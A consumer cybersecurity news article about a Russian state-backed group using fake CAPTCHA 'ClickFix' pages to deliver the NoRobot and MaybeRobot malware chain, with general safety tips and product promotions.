Russian hackers use fake CAPTCHA tests to spread new malware families to multiple targets
NEWNow you can listen to News articles!
Russian state-backed hackers have stepped up their game with new malware families hiding behind fake CAPTCHA tests. The group, known as Star Blizzard or ColdRiver, now uses ClickFix attacks to trick people into releasing dangerous malware disguised as a simple “I’m not a robot” check.
These attacks represent a new wave of cyber deception, targeting governments, journalists and NGOs with malware that changes faster than researchers can analyze.
Sign up to receive my FREE CyberGuy report
Get my best tech tips, urgent security alerts, and exclusive offers delivered right to your inbox. Plus, you’ll get instant access to my Ultimate Guide to Surviving Scams, free when you join me CYBERGUY.COM fact sheet
The ClickFix trap: a new type of social engineering
Google’s Threat Intelligence Group (GTIG) first observed hackers using the LostKeys malware in espionage operations. Once exposed by researchers, the attackers quickly changed course, abandoning LostKeys within a week and implementing new tools: NoRobot, YesRobot, and MaybeRobot.
NORTH KOREAN HACKERS USE AI TO FAKE MILITARY IDS
The ClickFix attack works like this: a victim lands on a fake CAPTCHA page that looks identical to the real one. When they click to prove they are human, the system silently runs NoRobot, infecting the computer and establishing persistence through registry changes and scheduled tasks.
A fake “I’m not a robot” CAPTCHA can launch hidden malware in seconds. (Jens Büttner/Picture Alliance via Getty Images)
Inside the Russian “robot” malware chain
Russian hackers built their latest attack around a chain of connected malware families that unfold step by step once a victim clicks on the fake CAPTCHA.
NoRobot: the entry point
NoRobot acts as the first stage of the infection. Prepare your environment by downloading files, modifying registry keys, and creating tasks to ensure it remains active even after a reboot.
YesRobot: The brief experiment
Hackers briefly tested YesRobot, a Python-based backdoor, but quickly abandoned it after realizing that the full Python installation attracted unwanted attention from defenders.
OVER 3000 YOUTUBE VIDEOS DELIVERY MALWARE DISGUISED AS FREE SOFTWARE
MaybeRobot: The new weapon
MaybeRobot replaced YesRobot as a stealthier PowerShell-based tool. It can download and execute payloads, execute command prompts, and send stolen data to attackers. Researchers say MaybeRobot development has now stabilized, allowing hackers to focus on refining NoRobot’s stealth.
How these attacks continue to evolve
Security analysts noted that the malware delivery chain has changed several times. At one point, it was “drastically simplified,” only to become complex again when attackers began splitting cryptographic keys across multiple files. This strategy makes it difficult for researchers to reconstruct how infections work. Without each piece of the puzzle, the final malware payload cannot be correctly decrypted.
Who is targeted by Russian malware?
ColdRiver’s operations have been linked to the Russian intelligence service (FSB), with years of activity focused on espionage and data theft. The group has systematically attacked Western governments, think tanks, media organizations and NGOs to steal sensitive information and gain strategic insights.
Despite sanctions, infrastructure takedowns and public exposure, hackers continue to evolve. Its quick shift from LostKeys to NoRobot and MaybeRobot shows a highly organized and well-funded operation capable of restructuring in a matter of days.
Researchers warn that Russian hackers are now using realistic CAPTCHA traps to spread new strains of “robot” malware. (Kristian Tuxen Ladegaard Berg/NurPhoto via Getty Images)
CAPTCHAGEDDON SIGNALS A DANGEROUS CHANGE
Even if you are not a government or corporate target, these evolving attacks serve as a reminder that anyone connected to the Internet is at some level of risk. Compromised personal accounts, reused passwords, or infected email attachments can make everyday users an easy entry point for larger campaigns.
While these threats may aim high, their reach extends far and wide. Awareness and cautious behavior online are essential for everyone.
How to stay safe from Russian malware hidden in fake CAPTCHAs
These practical steps can help you protect your data and devices from the growing wave of Russian malware that uses fake CAPTCHA pages to spread.
1) Beware of unexpected CAPTCHA challenges
Fake “I’m not a robot” pages are the main attraction of this Russian malware campaign. If you are redirected to a CAPTCHA on an unknown site or after clicking on a suspicious link, stop immediately. Real CAPTCHAs usually appear only on trusted websites, not on random pop-ups or login pages. If in doubt, close the page and check the URL before taking any action.
2) Use powerful antivirus software
Choose reliable antivirus protection that not only scans for known malware but also monitors for suspicious behavior. Because “Robot” malware evolves rapidly, behavior-based detection helps stop new variants before signature updates are available. Enable automatic updates and schedule daily scans to detect infections early. The best way to protect yourself from malicious links that install malware and potentially access your private information is to have powerful antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.
Get my picks for the best antivirus protection winners of 2025 for your Windows, Mac, Android, and iOS devices at Cyberguy.com
META ACCOUNT SUSPENSION SCAM HIDDEN MALWARE FILEFIX
3) Consider a data deletion service to reduce exposure.
Many cyberattacks start with publicly available data. Using a data removal or privacy protection service helps remove your personal information from data broker sites. By reducing what hackers can find online, it becomes more difficult for them to personalize phishing emails or social engineering traps that lead to malware infection.
While no service can guarantee complete removal of your data from the Internet, a data deletion service is truly a smart choice. They are not cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically deleting your personal information from hundreds of websites. It’s what gives me peace of mind and has proven to be the most effective way to delete your personal data from the Internet. By limiting the information available, you reduce the risk of scammers cross-referencing leak data with information they can find on the dark web, making it harder for them to target you.
Check out my top picks for data removal services and get a free scan to find out if your personal information is already available on the web by visiting Cyberguy.com
Get a free scan to find out if your personal information is already available on the web: Cyberguy.com
4) Keep everything updated software and operating systems
The malware used in these attacks takes advantage of known security flaws in unpatched systems. Always apply updates as soon as they are released. Activate automatic updates for your browser, antivirus and operating system. Outdated software is one of the easiest entry points for Russian hackers and other advanced groups.
Cyber experts say awareness is the best defense as these evolving attacks target both organizations and everyday users. (Kurt “CyberGuy” Knutsson)
AI FAILURE LEAKED GMAIL DATA BEFORE OPENAI PATCH
5) Use multi-factor authentication (MFA) whenever possible
Even if a hacker steals credentials through malware or phishing, Ministry of Foreign Affairs adds another layer of protection. Require it for email, VPN, and cloud services. This simple step can block most unauthorized access attempts.
6) Back up data regularly
A ransomware payload could be the next evolution of this malware family. Back up critical data to an external drive and cloud storage.
Kurt’s Key Takeaways
The rise of these Russian malware campaigns is a reminder that cybercriminals are always one step ahead. What seems like harmless “I’m not a robot” proof may actually hide a serious threat. Protecting yourself is not just about having antivirus software; It’s about being alert to the little details online that can make a big difference. Keep your devices up to date, question unexpected pop-ups, and use trusted tools to protect your personal information. With a little caution and consistency, you can outwit even the most devious attacks.
What worries you most about today’s online security risks? Let us know by writing to us at Cyberguy.com
CLICK HERE TO DOWNLOAD THE News APP
Sign up to receive my FREE CyberGuy report
Get my best tech tips, urgent security alerts, and exclusive offers delivered right to your inbox. Plus, you’ll get instant access to my Ultimate Guide to Surviving Scams, free when you join me CYBERGUY.COM fact sheet
Copyright 2025 CyberGuy.com. All rights reserved.
Kurt “CyberGuy” Knutsson is an award-winning technology journalist with a deep love for technology, gear and gadgets that improve lives with his contributions to News and News Business since mornings on “News & Friends.” Do you have any technical questions? Get Kurt’s free CyberGuy newsletter, share your voice, a story idea or comment on CyberGuy.com.